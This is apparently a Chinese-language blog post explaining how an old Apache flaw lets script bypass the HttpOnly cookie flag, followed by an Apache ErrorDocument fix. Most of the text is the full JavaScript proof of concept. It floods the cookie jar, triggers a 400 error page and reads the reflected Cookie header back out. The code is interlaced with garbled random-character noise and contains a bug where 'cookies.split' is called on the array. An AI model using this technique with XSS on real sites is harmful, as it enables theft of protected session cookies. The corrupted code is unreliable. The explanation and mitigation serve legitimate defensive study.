很多程序以及一些商业或成熟开源的CMS文章系统,为了防止XSS盗取用户cookie,一般都会给cookie加上httponly属性,禁止直接用js读取用户的cookie,从而降低XSS的危害;而本文描述的这个问题恰好可以用来绕过cookie的httponly属性。
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
+ a, u, A6 x3 G' X! ^/ r8 A& Ffunction setCookies (good) {7 }& z& T2 H4 l+ j( V6 K
// Construct string for cookie value4 K j- l u* V3 Q
var str = "";% Z* E/ [3 Q, l) n7 P
for (var i=0; i< 819; i++) {
0 i4 ~, K4 W9 }4 [9 Bstr += "x";
7 N8 b9 ~4 Z0 q" G- B. i6 F}4 Q8 z- _$ `& V3 @) f( `2 y
// Set cookies
$ l: p' F% ]; r9 P' C! j/ ^* \! ufor (i = 0; i < 10; i++) {* ^9 p+ f- e1 f* [, i
// Expire evil cookie3 j' \/ c5 h% F
if (good) {9 Z4 j5 ~2 r( R) O0 J' i& @
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
6 v5 M/ K0 n" m" y, c w}' ~" R! X' x7 s6 j8 l2 \
// Set evil cookie' y8 M+ I4 Q/ h2 `
else {
6 h, `% x X7 P& ]. Uvar cookie = "xss"+i+"="+str+";path=/";- h2 `& \& R+ G) B+ C
}
, I1 }5 [7 S* H5 ddocument.cookie = cookie;
E1 d; K9 j# ~0 g8 U W}
! b0 b' m3 t7 P; `" _5 b2 h}
// Fills the cookie jar with setCookies(), then issues a same-origin GET for "/"
// and hands the response to the nested parseCookies handler. As the surrounding
// post explains, on an affected Apache the request is answered with a 400 error
// page whose <pre> block reflects the request's Cookie header; the handler reads
// that text back, strips the xssN filler cookies, and shows the rest. The
// mitigation is covered in the 修复方案 section below: a custom
// ErrorDocument 400 so the error page no longer reflects request headers,
// and upgrading Apache.
// Takes no parameters and returns nothing; side effects are the cookie writes,
// the XHR, and the alert().
2 k0 S$ i+ k% Z! u- Hfunction makeRequest() {
9 m2 Y3 W) S9 @% I! `setCookies();* w' }$ u& ^" d% K ~3 x
// readystatechange handler; `xhr` is the variable declared further down in
// makeRequest (hoisted), so it is in scope here.
function parseCookies () {* h) _ E, C4 y" F6 \- w% O% T
var cookie_dict = {};
+ J% Q* L+ G! B- T# R// Only react on 400 status2 ^! X1 U1 }5 X( h9 \* W
if (xhr.readyState === 4 && xhr.status === 400) {& h9 h. A0 y/ C
// Replace newlines and match <pre> content
+ S" c( A" J1 }4 {" E) ivar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);9 a3 R: \6 L) M9 c j- @. Q
if (content.length) {; f) M- e% ?" @ z* c$ }9 D* |
// Remove Cookie: prefix
1 j7 H3 m6 M! [8 Y# K$ Econtent = content[1].replace("Cookie: ", "");
// Drop the xssN filler cookies, then split the remainder on ';'
0 b6 |& m& h& o/ }var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
* T& |" z* V- R) I4 Y// Add cookies to object
( I" y! o- i/ |* P) Z+ ^for (var i=0; i<cookies.length; i++) {
: M# ~1 _+ i; f3 s+ Qvar s_c = cookies.split('=',2);
# ?+ I+ O- m6 ~cookie_dict[s_c[0]] = s_c[1];
, }! p% ]" B( q4 n' J9 s; `3 T}. V6 V1 C* M6 h5 t0 {3 A! W
}+ d6 d5 T6 [0 \9 M
// Unset malicious cookies
b g$ b5 D, G' bsetCookies(true);& _. t! f. Z$ V6 T f6 g+ L
alert(JSON.stringify(cookie_dict));) |* z4 }' W' A. q. `( L
}) N) R, ~- S! A5 G2 L7 ?& e
}
$ i, T' B2 n. d2 z" p% F# p// Make XHR request
0 o+ I# |+ k$ Nvar xhr = new XMLHttpRequest();
' B3 n% s' F3 g3 Yxhr.onreadystatechange = parseCookies;
1 x- P/ `, V. [( w' Exhr.open("GET", "/", true);
0 z) s% i# f4 W7 bxhr.send(null);1 [7 y# P. `; n. s: f
}
// Entry point: runs once when the snippet is pasted into the console.
4 l. ~) ^& k% a1 j2 d$ r5 [makeRequest();
你就能看见华丽丽的400错误页面中包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message 输出一个简单生硬的错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容。
Apache配置:
ErrorDocument 400 "security test"
当然,升级apache到最新版本也可以修复此问题:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html